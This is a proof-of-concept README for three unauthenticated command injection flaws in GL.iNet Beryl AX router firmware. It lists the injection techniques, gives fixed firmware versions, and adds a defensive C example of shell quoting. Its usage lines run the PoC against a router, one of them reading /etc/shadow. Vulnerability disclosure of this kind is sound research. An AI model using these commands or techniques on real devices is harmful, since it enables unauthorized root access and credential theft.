## https://sploitus.com/exploit?id=F82812B2-209D-560F-A047-2C5FA823E1FD
# GL.iNet Beryl AX Triple RCE PoC

PoC for three unauthenticated command injection vulnerabilities (CVE-2026-11450, CVE-2026-11451, CVE-2026-11452) in the GL.iNet GL-MT3000 (Beryl AX) travel router firmware <= 4.4.5.

Full writeup: https://www.hunt-benito.com/glinet-beryl-ax-triple-rce-cve-2026-11450-11451-11452-unauthenticated-root-on-travel-router/

## Vulnerabilities

| CVE | CVSS | Technique |
|-----|------|-----------|
| CVE-2026-11450 | 7.3 | Buffer size mismatch (0x40 vs 0x100) bypasses `access()` gate, `$()` injected via `system()` |
| CVE-2026-11451 | 7.3 | Single-quote escape in FTP `media_dir` parameter breaks shell quoting |
| CVE-2026-11452 | 7.3 | `$()` command substitution in Samba password parameter inside double-quoted `printf` |

All three exploit the unauthenticated `/cgi-bin/glc` CGI dispatcher, which loads plugins via `dlopen`/`dlsym` with no authentication or method allowlist.
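The CVE-2026-11451 and CVE-2026-11452 rows both come down to a request parameter reaching a shell command string with quoting the value can escape or expand inside. The following is an added defensive example, not code from the PoC or from the GL.iNet firmware: it shows an allowlist check and single-quote escaping for `/bin/sh`. The function names, the accepted character set and the 64-byte limit are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Allowlist for a path-like parameter: only bytes with no shell meaning.
 * The accepted character set is an assumption for this example. */
int param_is_safe(const char *s, size_t max_len)
{
    size_t n = strlen(s);
    if (n == 0 || n >= max_len)
        return 0;
    return strspn(s, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
                     "0123456789/_.-") == n;
}

/* Wrap s in single quotes for /bin/sh, rewriting each ' as '\'' so the
 * value can never close the quoting. Returns 0, or -1 if out is too small. */
int sh_single_quote(const char *s, char *out, size_t out_sz)
{
    size_t o = 0;
    if (out_sz < 3)
        return -1;
    out[o++] = '\'';
    for (; *s; s++) {
        size_t k = (*s == '\'') ? 4 : 1;
        if (o + k + 2 > out_sz)        /* keep room for closing ' and NUL */
            return -1;
        if (k == 4)
            memcpy(out + o, "'\\''", 4);
        else
            out[o] = *s;
        o += k;
    }
    out[o++] = '\'';
    out[o] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed sample values, not taken from the PoC. */
    const char *samples[] = { "/mnt/sda1/media", "a'b", "$(x)" };
    char q[64];
    for (size_t i = 0; i < 3; i++) {
        int rc = sh_single_quote(samples[i], q, sizeof q);
        printf("%-16s safe=%d quoted=%s\n", samples[i],
               param_is_safe(samples[i], 64), rc == 0 ? q : "(too long)");
    }
    return 0;
}
```

Inside single quotes the shell performs no `$()` expansion, which is why the escaped form is safe where a double-quoted `printf` argument is not. Passing the value as an `argv` element to `execve()` instead of building a string for `system()` removes the shell from the path entirely.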

## Usage

```bash
# Exploit all three CVEs
python3 poc.py http://192.168.8.1

# Exploit a specific CVE
python3 poc.py http://192.168.8.1 -c "id" -v 11450
python3 poc.py https://192.168.8.1 -c "id" -v 11451
python3 poc.py https://192.168.8.1 -c "id" -v 11452

# Custom command and output file
python3 poc.py http://192.168.8.1 -c "cat /etc/shadow" -o /tmp/pwned
```

## Requirements

- Python 3.6+
- Network access to the router's LAN IP (default: 192.168.8.1)
- No credentials required

## Affected Versions

- GL.iNet GL-MT3000 firmware <= 4.4.5
- Fixed in firmware 4.7 (CVE-2026-11450) and 4.8.1 (CVE-2026-11451, CVE-2026-11452)

## Disclaimer

For educational and authorized security research purposes only. Do not use against systems you do not own or have explicit permission to test.